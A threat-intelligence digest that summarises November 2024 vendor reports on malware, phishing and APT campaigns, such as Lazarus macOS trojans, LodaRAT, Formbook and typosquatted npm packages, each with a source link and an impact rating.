Source: https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/

Intel Source:: Group-IB

Intel Name:: Stealthy_Attributes_of_APT_Lazarus

Date of Scan:: 2024-11-13

Impact:: MEDIUM

Summary:: APT Lazarus, a notorious cyber threat group, has recently employed a novel technique to conceal malicious code within custom extended attributes (EAs) on macOS systems. Extended attributes, which store additional metadata about files, were used to smuggle trojan payloads in a way that bypasses traditional detection mechanisms, such as antivirus software and macOS’s Gatekeeper. Group-IB researchers discovered a trojan, named RustyAttr, built using the Tauri framework, which fetches and executes malicious scripts from EAs when the application is launched. These applications were initially signed with a leaked certificate, later revoked by Apple, but still remain undetected by security tools.

Source: https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/

Intel Source:: Palo Alto

Intel Name:: Phishing_Domains_For_The_Holidays

Date of Scan:: 2024-11-13

Impact:: MEDIUM

Summary:: In early November, a threat actor registered over 550 domains impersonating legitimate booking sites, banks, crypto wallets, and restaurants, using the email address ilotirabec207@gmail[.]com for all the registrations. Analysis revealed that many of these domains were previously registered and "dropcaught" before 2024, with some actively used in phishing scams targeting victims to steal sensitive information such as login credentials and financial details. While most of the domains are still stockpiled, 90% of the active ones use Cloudflare for domain fronting, making it harder to trace, while 10% are hosted on shared servers, which could expose the true hosting IP addresses.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-11-13-phishing-domains-for-the-holidays.txt

Intel Source:: Recorded Future

Intel Name:: Tibetan_Websites_Targeted_in_Cobalt_Strike_Attack

Date of Scan:: 2024-11-13

Impact:: MEDIUM

Summary:: In May 2024, the Chinese state-sponsored threat actor group TAG-112 compromised at least two Tibetan community websites, injecting malicious JavaScript that spoofed a TLS certificate error page to deliver Cobalt Strike. The attack was obfuscated through Cloudflare-protected infrastructure, making it difficult to trace. Insikt Group researchers have identified six Cobalt Strike Beacon samples linked to the campaign, and as of now, the websites remain compromised, with parts of the malicious infrastructure still active. TAG-112 shares overlap with the previously identified group TAG-102 (Evasive Panda), which also targets the Tibetan community.

Source: https://go.recordedfuture.com/hubfs/reports/cta-cn-2024-1112.pdf

Intel Source:: Jamf Threat Labs

Intel Name:: APT_Actors_Embed_Malware_within_macOSFlutter

Date of Scan:: 2024-11-12

Impact:: MEDIUM

Summary:: Jamf Threat Labs has identified a new form of malware targeting macOS devices, likely linked to North Korean APT groups. The malware, which includes variants built using Go, Python, and Flutter, was designed to evade detection through obfuscation techniques. Notably, the Flutter-built application, which masquerades as a minesweeper game, was signed with a legitimate developer certificate before being revoked by Apple. This malware connects to a known DPRK-associated domain and uses AppleScript to execute remote commands, highlighting its ability to bypass security checks, including Apple's notarization process.

Source: https://www.jamf.com/blog/jamf-threat-labs-apt-actors-embed-malware-within-macos-flutter-applications/

Intel Source:: Rapid7

Intel Name:: LodaRAT_Malware

Date of Scan:: 2024-11-12

Impact:: LOW

Summary:: Rapid7 researchers have discovered a new version of LodaRAT that includes advanced features to steal cookies and passwords from Microsoft Edge and Brave browsers. The malware first appeared in 2016 and is written in AutoIt. LodaRAT has multiple capabilities such as data collection and exfiltration, delivering additional malware, screen capture, control over the victim’s camera or mouse, and the ability to spread within compromised networks. Initially, it was distributed through phishing emails and exploits of vulnerabilities but now being distributed via DonutLoader and CobaltStrike. It also masquerades as popular software like Discord, Skype, and Windows Update. The campaign appears to target victims globally with a significant portion in the USA.

Source: https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new-victim-patterns/

Intel Source:: Checkpoint

Intel Name:: Hamas_Affiliated_Threat_Actor_WIRTE

Date of Scan:: 2024-11-12

Impact:: MEDIUM

Summary:: Researchers at CheckPoint have identified a Middle East based threat actor called Write which is active since 2018 and linked to Hamas via the Gaza Cybergang. The group is primarily focus on intelligence gathering through politically motivated espionage and targeting entities in Palestinian Authority, Jordan, Iraq, Egypt, and Saudi Arabia. This group has expanded its reach from cyber operations to destructive attacks. Recently, the group has initiated email campaign impersonating ESET, a cybersecurity firm, to spread wiper malware called SameCoin. These emails appeared that user devices were compromised by attackers, urging them to click a link that secretly deployed the malware. This malware impersonated the Israeli National Cyber Directorate was designed to destroy data rather than steal it.

Source: https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/

Intel Source:: CERT-AGID

Intel Name:: New_Formbook_Malware_Campaign

Date of Scan:: 2024-11-12

Impact:: LOW

Summary:: Researcher at CERT-AGID identified a malspam campaign targeting users across Italy. It is Italian a campaign in which users are compromised with Formbook malware which is known for stealing information. In this campaign, users receive an urgent email about unpaid invoices which creates urgency to quickly open an attached 7Z compressed file called “Last reminder for payment of overdue invoice”. Once user clicks on the file, the final payload starts executing on the victim's machine which then begins its infostealing activities.

Source: https://cert-agid.gov.it/news/studio-di-una-nuova-campagna-formbook-attiva-in-italia/

Intel Source:: Solar

Intel Name:: GoblinRAT_A_Linux_Backdoor

Date of Scan:: 2024-11-12

Impact:: LOW

Summary:: Solar researchers have discovered a malware named Goblin RAT which has infected systems across multiple organizations for over two years. The malware is written in Golang language and is highly capable of hiding itself and its activity. It often masquerades as legitimate services like Zabbix and Red Hat subscription services. Attackers uses compromised websites and DNS to communicate with GoblinRAT and every compromised machine has a unique address. They use Linux tool such as shred to clear logs and scp and curl for data exfiltration and leave minimal traces. Although no specific group has been linked to GoblinRAT but it is clear they are targeting confidential information from government agencies and contractors.

Source: https://rt-solar.ru/solar-4rays/blog/4861/

Intel Source:: Any.Run

Intel Name:: AsyncRAT_Infection_Tactics_via_Open_Directories

Date of Scan:: 2024-11-12

Impact:: LOW

Summary:: Researchers from Any.Run have observed two methods where attackers are distributing AyncRAT through open internet directories. In the First method, a VBS script downloads and extracts the JPG which contains additional scripts that eventually trigger AsyncRAT. The second method also uses a text file and a JPG file which contains a VBS script that downloads and executes a PowerShell file to load AsyncRAT directly into memory. Both methods involve multiple stages, including PowerShell, batch files, and scheduled tasks, to keep the malware active on the infected system.

Source: https://any.run/cybersecurity-blog/asyncrat-open-directories-infection-analysis/

Intel Source:: Cyble

Intel Name:: Multi_Stage_PowerShell_Attack_with_Chisel

Date of Scan:: 2024-11-12

Impact:: LOW

Summary:: Researchers from Cyble have discovered an advanced, multi-phase PowerShell campaign that initiates scripts for persistence and covert C&C communication using a suspicious LNK file. Chisel as well as a Netskope proxy are part of the attack's multi-layered architecture, which enables lateral movement and secret data exfiltration within compromised networks.

Source: https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/

Intel Source:: Clear Skys

Intel Name:: Iranian_Dream_Job_Campaign_Targets_Aerospace

Date of Scan:: 2024-11-12

Impact:: MEDIUM

Summary:: ClearSky researchers have identified the “Iranian Dream Job campaign,” in which the Iranian threat actor TA455 targeted the aerospace industry by offering fake job opportunities. The campaign distributed the SnailResin malware, which activates the SlugResin backdoor. They attribute both malware programs to Charming Kitten, an Iranian threat actor subgroup. However, some cyber research companies detected the malware as being associated with the North Korean Kimsuky/Lazarus APT group.

Source: https://www.clearskysec.com/wp-content/uploads/2024/11/Iranian-Dream-Job-ver1.pdf

Intel Source:: Malwarebytes

Intel Name:: FakeBat_Malware_Returns_via_Google_Ads

Date of Scan:: 2024-11-11

Impact:: LOW

Summary:: Researchers from Malwarebytes have found the reemergence of FakeBat (aka Eugenloader, PaykLoader) malware via a malicious Google ad for the Notion app, indicating a comeback in the use of search engine ads to distribute malware. Last observed in July 2024, FakeBat uses brand imitation strategies to appear authentic, luring victims into downloading follow-up payloads such as Lumma stealer, exhibiting threat actors' ability to avoid detection.

Source: https://www.malwarebytes.com/blog/news/2024/11/hello-again-fakebat-popular-loader-returns-after-months-long-hiatus

Intel Source:: Securelist

Intel Name:: Ymir_Ransomware

Date of Scan:: 2024-11-11

Impact:: MEDIUM

Summary:: Securlist researchers have discovered a new ransomware family named Ymir, which is identified in active use by attackers. The adversary initially gained system access via PowerShell remote control commands and deployed tools like Process Hacker and Advanced IP Scanner to compromise security. Ymir's execution involved sophisticated memory-based operations using functions like malloc, memmove, and memcmp, making detecting it more difficult.

Source: https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/

Intel Source:: ESET Research

Intel Name:: Uncovering_RedLine_Backend_Operations

Date of Scan:: 2024-11-11

Impact:: LOW

Summary:: Researchers from ESET have identified over 1,000 IP addresses associated to RedLine Stealer's control panels and discovered modules disclosing its operational methods. The 2023 version used the Windows Communication Framework, whereas the 2024 version switched to a REST API. They also discovered evidence that RedLine Stealer and META Stealer were most likely created by the same person.

Source: https://www.welivesecurity.com/en/eset-research/life-crooked-redline-analyzing-infamous-infostealers-backend/

Intel Source:: CERT-AGID

Intel Name:: Vidar_Malware_Targets_Italian_PEC_Mailboxes_Again

Date of Scan:: 2024-11-11

Impact:: LOW

Summary:: The Vidar malware reappears a week after a previous wave of attacks, using hijacked PEC mailboxes to target Italian email accounts. This new campaign uses similar techniques as before, including the use of VBS payloads instead of JS files, and maintains the abuse of .top domains. However, the URLs for downloading malicious components have been updated to evade detection. Vidar continues to pose a significant threat, capable of stealing sensitive data, and the use of trusted PEC mailboxes increases the likelihood of recipients being tricked into opening malicious emails.

Source: https://cert-agid.gov.it/news/vidar-nuovamente-attivo-in-italia-tramite-caselle-pec-compromesse-nuova-campagna-con-url-aggiornati/

Intel Source:: Palo Alto

Intel Name:: Newly_Registered_Domains_in_JapanTargeted_Phishing

Date of Scan:: 2024-11-11

Impact:: LOW

Summary:: Unit 42 researches identified a prolonged phishing campaign is targeting a wide range of sectors in Japan, including financial institutions, electric utilities, logistics services, and more. The attackers often register domains for temporary landing pages, typically hosted on public cloud platforms.

Source: https://x.com/Unit42_Intel/status/1856063191203057995

Intel Source:: Trend Micro

Intel Name:: Earth_Estries_Exploits_Exchange_Vulnerabilities

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered that Earth Estries uses two attack chains that exploit Microsoft Exchange and network adaptor vulnerabilities. The first chain uses CAB files to execute tools like PsExec and Trillclient, but the second chain uses cURL to execute malware such as Zingdoor. Earth Estries maintains persistence through tool upgrades, backdoors enabling lateral movement, credential theft, and data exfiltration via anonymous methods.

Source: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html

Intel Source:: Securelist

Intel Name:: New_Tactics_in_CloudComputating_Operations

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: Researchers from Securelist have discovered a tactical shift in the cloudComputating group, which used the QSC framework with the Quarian backdoor in targeted telecom campaigns. The adoption of a protected Quarian variation and the QSC architecture demonstrates their increasing toolbox and adaptability, emphasizing the importance of constant monitoring.

Source: https://securelist.com/cloudcomputating-qsc-framework/114438/

Intel Source:: Fortinet

Intel Name:: New_Campaign_Uses_Remcos_RAT

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: Researchers at Fortinet have identified a phishing campaign where attackers are distributing a new variant of the Remcos RAT, a remote administration tool. This tool is often misused by cybercriminals to control and steal information from victims' machine. The attack starts with a phishing email containing a malicious Excel document that exploits a vulnerability (CVE-2017-0199) to download and run an HTA file which executes malicious scripts on the victim’s device. These scripts download a "dllhost.exe" file that initiates PowerShell process.

Source: https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APT_C_08_Attack_Vectors_and_Trends_Analysis

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: APT-C-08, also known as Manlinghua or Bitter, is a South Asia-based APT group with a strong political agenda. The group primarily targets government entities, military industries, universities, and overseas institutions in South Asia and neighboring regions. Their main objective is to steal sensitive information through various attack vectors, often using malicious documents to exploit users into downloading payloads. Over the past year, numerous attack samples have been identified, including PUB, PDF, macro documents, CHM files, and other less commonly known formats.

Source: https://mp.weixin.qq.com/s/pvm0QUAMS0U5dIge1ImcCQ

Intel Source:: Linkedin

Intel Name:: Helldown_Ransomware_Group

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: The Helldown Ransomware Group has recently emerged on the Surface Web, having targeted 31 victims. Primarily affecting Windows systems, the group has focused on industries such as services, healthcare, construction, manufacturing, and retail, with the United States, Germany, and France being the most targeted countries. The group's ransom note appears to be a modified version of one used by the 8Base Ransomware Group, featuring intentional spelling errors like "cantact" and "setle". Additionally, the ransom note is partial and similar to notes from the Dark Angels and White Rabbit groups. The attackers claim to have exploited zero-day vulnerabilities in their campaigns.

Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-helldown-ransomware-activity-7260536280906629121-0YxQ?utm_source=share&utm_medium=member_desktop

Intel Source:: Socket

Intel Name:: Roblox_Developers_Targeted_with_NPM_Packages

Date of Scan:: 2024-11-08

Impact:: LOW

Summary:: Socket researchers have discovered five malicious npm packages targeting Roblox users and developers. These packages named node-dlls, ro.dll, autoadv, and two versions of rolimons-api that mimic legitimate modules because attacker has used typosquatted packages to trick developers into installing malware such as Skuld infostealer and Blank Grabber. Skuld is written in Go and Blank Grabber is Python-based malware. Both malwares are capable to extract data from Windows systems and targets Discord, popular web browsers, and cryptocurrency wallets to steal sensitive information like credentials, financial details, and personal data. These attackers often use GitHub to host malicious files and Discord and Telegram for C2 operations.

Source: https://socket.dev/blog/roblox-developers-targeted-with-npm-packages-infected-with-infostealers

Intel Source:: Cado Security Labs

Intel Name:: GuLoader_Malware_Targeting_European_Industry

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Researchers at Cado Security have uncovered a GuLoader malware campaign targeting industrial and engineering companies across Europe including countries such as Romania, Poland, Germany, and Kazakhstan. GuLoader malware is active since 2019 and used to deliver RAT. In this campaign, attackers are sending spear-phishing emails with fake order inquiries that contain an archive file attachment in formats like ISO, 7z, gzip, or RAR. These emails come from fake companies or compromised accounts and often hijacking ongoing email conversation to appear legitimate. The attachment contains a compressed batch file which executes a PowerShell script that initiates GuLoader malware.

Source: https://www.cadosecurity.com/blog/guloader-targeting-european-industrial-companies

Intel Source:: Cloudsek

Intel Name:: Androxgh0st_Botnet

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: CloudSEK researchers have uncovered a re-emerged botnet called Androxgh0st which was previously known as Mozi botnet. Initially it used to target IoT devices but this updated botnet is targeting not only IoT devices but also web servers and applications from Cisco ASA, Atlassian JIRA, and PHP frameworks. Androxgh0st botnet is capable for stealing credentials and maintain persistent access through remote code execution. It is known for exploiting unpatched vulnerabilities to infiltrate critical infrastructure and establish backdoor access.

Source: https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave

Intel Source:: Sentinelone

Intel Name:: Hidden_Risk_Malware

Date of Scan:: 2024-11-07

Impact:: MEDIUM

Summary:: Researchers from Sentinel have identified a new campaign called Hidden Risk operated by North Korean state-sponsored threat group BlueNoroff targeting cryptocurrency and DeFi businesses. The attackers use phishing emails that contains a malicious link that appear to be a PDF document but actually downloads a malicious Swift-language-based Mac application disguised as a PDF reader. The fake application appears to show a PDF on cryptocurrency topics such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi but secretly downloads a backdoor called Growth. It gathers sensitive information about the infected system, communicates with a remote server controlled by the attackers, and can potentially receive and execute commands.

Source: https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/

Intel Source:: Malwarebytes

Intel Name:: eBay_Users_Targeted_by_Malicious_Ads

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered a significant malvertising attempts targeting eBay customers in the United States through bogus Google advertising that drive users to scam sites posing as help pages. Victims are encouraged to dial fake numbers, risking financial loss in remote access scams.

Source: https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-campaign-leads-to-scams

Intel Source:: Cisco Talos

Intel Name:: Interlock_Ransomware

Date of Scan:: 2024-11-07

Impact:: MEDIUM

Summary:: Cisco researchers have uncovered a new ransomware group named Interlock that first emerged in September 2024. This group is involved in big-game hunting and double extortion attacks. Interlock targets various organisations such as healthcare, technology, government in the U.S and manufacturing in Europe. They operate a data leak website "Worldwide Secrets Blog" where they publish victims' data and provide a contact email for negotiation. Interlock gains access through a Remote Access Tool disguised as a browser update, then runs PowerShell scripts and tools to steal credentials and log keystrokes before deploying the ransomware. They primarily use AnyDesk and PuTTY for network movement and Azure Storage Explorer and AZCopy for data exfiltration.

Source: https://blog.talosintelligence.com/emerging-interlock-ransomware/

Intel Source:: Checkpoint

Intel Name:: CopyRhightadamantys_Campaign

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Checkpoint researchers have identified a phishing campaign called CopyRh(ight)adamantys where attackers are deploying new version of Rhadamanthys stealer (version 0.7). The attacker uses phishing emails that appears to be from multiple companies which claims that user has committed copyright violations on their Facebook page. These emails come from multiple Gmail accounts which includes the link to download and install Rhadamanthys stealer. The campaign targets sectors such as media, entertainment, and tech across the United States, Europe, East Asia, and South America.

Source: https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-latest-rhadamanthys-version/

Intel Source:: WIZ Blog

Intel Name:: 0ktapus_Threat_Group

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Researchers from Wiz have uncovered a financially motivated group called Oktapus (also known as Scattered Spider, UNC3944, Storm-0875, and Starfraud) that has been active since 2022. This group is known for targeting cloud infrastructures and gaining initial access through IT service desk personnel and administrators to steal data, deploy ransomware, and extort their victims. The group primarily depends on social engineering tactic such as smishing ,vishing, MFA fatigue, and SIM hijacking to breach organizations. Oktapus’s campaigns focus on tricking users to gain initial access by creating phishing landing pages that mimic legitimate login portals of targeted organizations. When victims enter their credentials on these fake sites, 0ktapus captures and exploits this data to infiltrate corporate networks.

Source: https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktapus-domains

Intel Source:: Hunters

Intel Name:: Unmasking_VEILDrive

Date of Scan:: 2024-11-07

Impact:: MEDIUM

Summary:: Researchers from Hunters have uncovered an ongoing campaign which has been active since 2023 called VEILDrive. This campaign targets organizations by exploiting Microsoft’s cloud services such as Teams, SharePoint, Quick Assist, and OneDrive and appears to originate from Russia. The attackers use these platforms to distribute spear-phishing emails and store malicious software. The malware associated with VEILDrive is a java based [.]jar file which is east to read and understand. VEILDrive use a technique to control the malware through OneDrive on compromised machine.

Source: https://www.hunters.security/en/blog/veildrive-microsoft-services-malware-c2#title5

Intel Source:: Palo Alto

Intel Name:: Silent_Skimmer_Returns

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Palo Alto researchers have identified a financially motivated threat group, linked to the Silent Skimmer campaign, is actively targeting companies involved in payment infrastructure and online payment gateways. This group returned with almost same TTP to steal payment information by exploiting vulnerabilities in older versions of Telerik UI, a web development tool. These vulnerabilities allowed the cybercriminals to gain access to servers within a North American multinational organization and exfiltrate payment information. The attacker uses various techniques such as privilege escalation tools and reverse proxies to keep control over the servers and employ a Python script to extract payment data from company databases into a CSV file for easy exfiltration.

Source: https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/

Intel Source:: Trellix

Intel Name:: Fickle_Stealer

Date of Scan:: 2024-11-07

Impact:: LOW

Summary:: Trellix researchers have discovered a Rust-based information stealer called Fickle which is active since in May 2024. It spread through various methods like phishing emails with malicious attachments, drive-by downloads, exploit kits, and social engineering tactics. It is added to various file formats such as Word documents, executable files, and shortcuts files. Fickle Stealer uses a PowerShell script to bypass User Account Control (UAC) and can steal sensitive information such as files, system details, browser data, and cryptocurrency wallet information from compromised systems. Additionally, the malware can download files, take screenshots, and even delete itself after displaying a fake error message. This stealer masquerades as GitHub Desktop for Windows and uses an invalid digital signature.

Source: https://www.trellix.com/blogs/research/new-stealer-uses-invalid-cert-to-compromise-systems/

Intel Source:: ISC.SANS

Intel Name:: Python_RAT_with_Screensharing_Feature

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: SANS researchers have analyzed how a Python-based Remote Access Trojan (RAT) is designed with a unique and user-friendly screensharing capability. It highlights the implementation of the RAT, including its key features and how it is used for remote control of compromised systems.

Source: https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/31414/

Intel Source:: Sophos

Intel Name:: Gootloader_Campaign

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: Sophos researchers have identified a malware called GootLoader which uses the SEO poisoning technique to deceive victims into downloading malicious files. This technique allows attackers to manipulate search engine results to make malicious websites appear at the top of search rankings. In this campaign where victims are searching for queries like "Are Bengal cats legal in Australia?" are redirected to compromised sites that hosts the GootLoader payload. Once a victim downloads and opens the malicious file, it initiates GootLoader payload at first stage. If it is undetected, it deploys second-stage payload named GootKit which is an info-stealer and remote access trojan.

Source: https://news.sophos.com/en-us/2024/11/06/bengal-cat-lovers-in-australia-get-psspsspssd-in-google-driven-gootloader-campaign/

Intel Name:: Winos40_Spread_Through_Game_Application

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: FortiGuard researchers have discovered the Winos4.0 malicious framework that allow attackers to control compromised device to carry out further malicious actions. Winos4.0 is based on a tool named Gh0strat which give attackers flexible control and has appeared in multiple campaigns such as Silver Fox. The malware is often disguised within game-related applications including installation tools, speed boosters, and optimization utilities. It seems targeting educational sector. Winos4.0 is similar to Cobalt Strike and Sliver which allow attackers to maintain control over compromised systems by using encrypted communications with their C2 servers.

Source: https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos4-through-game-application

Intel Source:: Securelist

Intel Name:: SteelFox_Malware_Targets_Mass_Data_Theft

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: Researchers from Securelist have discovered SteelFox as a sophisticated crimeware package capable of large-scale data theft, using advanced C++, TLSv1.3, and SSL pinning for safe data exfiltration. It collects a large amount of user data without discrimination for further analysis.

Source: https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/

Intel Source:: Threatdown

Intel Name:: PowerShell_Obfuscation_by_Black_Basta

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: Researchers from ThreatDown have discovered that Black Basta ransomware operators are employing PowerShell scripts with encoded commands and covert execution switches to avoid detection and install Cobalt Strike beacons. This "living off the land" technique allows them to blend into target locations, making it more difficult for security teams to detect their presence before launching a ransomware attack.

Source: https://www.threatdown.com/blog/how-black-basta-used-powershell-to-set-up-a-cobalt-strike-beacon/

Intel Source:: Hunt.IO

Intel Name:: RunningRAT_Shift_to_Crypto_Mining_Payload

Date of Scan:: 2024-11-06

Impact:: LOW

Summary:: Researchers at Hunt.IO have examined the evolving use of RunningRAT, a remote access trojan (RAT) initially known for remote access and information-stealer, which has now been observed deploying crypto mining payloads. The analysis highlights a RunningRAT sample found in an open online repository, linked to a second server hosting crypto mining tools. It explores the malware's communication with a separate VPS, indicating a coordinated infrastructure for staging and delivery.

Source: https://hunt.io/blog/runningrat-from-remote-access-to-crypto-mining

Intel Source:: BI Zone

Intel Name:: Venture_Wolf_Threat_Group

Date of Scan:: 2024-11-05

Impact:: MEDIUM

Summary:: Researchers from BI.ZONE have identified a new threat actor group called Venture Wolf which has been active since November 2023. This group uses multiple loaders to deliver MetaStealer, a malware that steals data from targeted system. The attackers mainly focus on industries such as manufacturing, construction, IT, and telecommunications. Venture Wolf distributes compressed files that contain a loader with a [.]com or [.]exe extension along with one or more phishing documents. The loader either creates a fake .NET file to inject malicious code or injects it into a legitimate Windows process to avoid detection. They often use various image and text files such as JPG, PNG, PDF, DOC/DOCX, and ODT files as decoys to trick users into running the malware.

Source: https://bi.zone/eng/expertise/blog/venture-wolf-ispolzuet-metastealer-v-atakakh-na-rossiyskie-kompanii/

Intel Source:: Hybrid Analysis

Intel Name:: North_Korean_Keylogger_Targets_US_Organizations

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: Researchers at Hybrid Analysis have dived deep into the new North Korean keylogger, attributed to the Andariel group (also known as APT45, Silent Chollima, or Onyx Sleet), which has been linked to targeted attacks against U.S. organizations. The malware logs keystrokes and mouse activity, storing the data in a password-protected, encrypted archive.

Source: https://hybrid-analysis.blogspot.com/2024/11/recent-keylogger-attributed-to-north.html?m=1

Intel Source:: Malwarebytes

Intel Name:: Bing_Phishing_Targets_Banking_Credentials

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: Researchers from Malwarebytes have identified phishing targeting banking credentials on Microsoft's Bing, with malicious URLs appearing in the top search results for 'Keybank login.' These phishing sites evade two-factor authentication and were quickly reported to Microsoft.

Source: https://www.malwarebytes.com/blog/scams/2024/11/crooks-bank-on-microsofts-search-engine-to-phish-customers

Intel Source:: SonicWall

Intel Name:: Stealc_Malware

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: SonicWall researchers have examined a sample of Stealc malware. It is an infostealer that infiltrates a victim's system to steal credentials from browsers, cryptocurrency wallets, and file-sharing servers. Stealc monitors user activity by tracking processes, keystrokes, active windows, and mouse clicks, and it can also disable security programs and adjust network settings to enable proxy connections. Additionally, it inspects the system’s hardware, Windows settings and down the monitor resolution.

Source: https://blog.sonicwall.com/en-us/2024/11/stealc-malware-checks-everything-even-the-screen-resolution/

Intel Source:: Linkedin

Intel Name:: Phishing_Scams_Targeting_E_commerce_Shoppers

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: During the Diwali festival, cybercriminals are taking advantage of online shopping sales like Flipkart's Big Diwali 2024 sale by creating phishing websites that lure people with fake offers, such as an iPhone for only 800 RS. These fraudulent sites are designed to steal personal information and money. While 2000 such websites have been identified, over 5,000 new phishing sites have been created in the past month, many of which specifically target mobile users. This growing threat exploits the festival's shopping frenzy to scam unsuspecting victims.

Source: https://www.linkedin.com/posts/mohit-kumar-4ab6b3bb_phishing-flipkart-scam-activity-7255197010411053057-FZ8Z?utm_source=share&utm_medium=member_desktop

Intel Source:: Checkmarx

Intel Name:: Supply_Chain_Attack_Targets_Developers

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: Researchers from checkmarx have discovered a supply chain attack in the NPM ecosystem that exploited Ethereum smart contracts for C2 distribution. The typosquatting effort targets developers and spreads cross-platform malware across Windows, Linux, and macOS. It uses NPM preinstall scripts to execute information-stealing programs and establish persistence on compromised devices.

Source: https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contracts-to-distribute-multi-platform-malware/

Intel Source:: Palo Alto

Intel Name:: Advanced_DNS_Hijacking_Detection

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: Researchers from Palo Alto Networks have developed a method for detecting DNS hijacking, which identified over 6,700 incidents between March and September 2024. This technology uses machine learning to analyze millions of DNS records everyday, finding risks in minutes.

Source: https://unit42.paloaltonetworks.com/detect-dns-hijacking-passive-dns/

Intel Source:: ISC.SANS

Intel Name:: Decrypting_and_Analyzing_an_Encrypted_Phishing_PDF

Date of Scan:: 2024-11-05

Impact:: LOW

Summary:: SANS ISC researchers have provided a detailed analysis of an encrypted phishing PDF used in a cyberattack. It walks through the steps of examining the file, demonstrating how attackers leverage encryption to bypass traditional security filters. The researcher explains the process of decrypting the PDF, reviewing its contents, and identifying the malicious tactics, such as social engineering and payload delivery mechanisms.

Source: https://isc.sans.edu/diary/Analyzing+an+Encrypted+Phishing+PDF/31404/

Intel Source:: Palo Alto

Intel Name:: Threat_Actor_Exposed_in_Cortex_XDR_Attempt

Date of Scan:: 2024-11-04

Impact:: LOW

Summary:: Researchers from Palo Alto have identified a unique incident involving a threat actor’s unsuccessful attempt to overcome Cortex XDR, which provided important insight into their operations. The investigation, which began with an extortion attempt, found that the threat actor gained access to a client's network using the Atera RMM platform, which was purchased from an initial access broker.

Source: https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/

Intel Source:: Checkpoint

Intel Name:: Unveiling_APT36_and_the_Evolution_of_ElizaRAT

Date of Scan:: 2024-11-04

Impact:: LOW

Summary:: Checkpoint researchers have uncovered Pakistan-based cyber-espionage group called Transparent Tribe also known as APT36. This group often targets Indian government, diplomatic personnel, and military entities using a malware known as ElizaRAT which is a Windows-based Remote Access Tool (RAT). ElizaRAT infections are often spread through phishing emails that contain malicious Control Panel (CPL) files which are hosted on Google drive. The malware frequently uses cloud services like Google Drive, Telegram, and Slack to manage its C2 communications. ElizaRAT also deploys a secondary payload called ApoloStealer which is designed to steal specific data from compromised machine.

Source: https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/

Intel Source:: Cleafy

Intel Name:: ToxicPanda_Targets_Europe_and_LATAM

Date of Scan:: 2024-11-04

Impact:: LOW

Summary:: Cleafy researchers have uncovered an Android banking Trojan campaign called ToxicPanda. It is Remote Access Trojans that enables attackers to take over accounts directly from compromised system using a method called On Device Fraud (ODF). This method allows attackers to bypass bank security measures, such as identity verification and behavioural detection. Researchers also identified that 1500 devices were compromised across Italy, Portugal, Spain, and Latin America. The attackers behind this campaign appear to be Chinese speakers that rarely target regions like Europe and Latin America for banking fraud. However, the attackers are expanding their targets to Latin America and Europe.

Source: https://www.cleafy.com/cleafy-labs/toxicpanda-a-new-banking-trojan-from-asia-hit-europe-and-latam

Intel Source:: CERT-AGID

Intel Name:: Vidar_strikes_in_Italy_through_compromised_PECs

Date of Scan:: 2024-11-04

Impact:: LOW

Summary:: CERT-AGID researchers have identified a new malspam campaign distributing Vidar malware through phishing emails. The attackers send an email that appear to come from a legitimate Italian company and warn recipients about unpaid invoice. The email contains a link disguised as the word Invoice. If user clicks on that link, it initiates the download of a malicious VBS file that begins a series of malicious actions.

Source: https://cert-agid.gov.it/news/vidar-torna-a-colpire-in-italia-attraverso-pec-compromesse/

Intel Source:: Linkedin

Intel Name:: North_Korean_Groups_Using_SliverC2_in_Attacks

Date of Scan:: 2024-11-04

Impact:: LOW

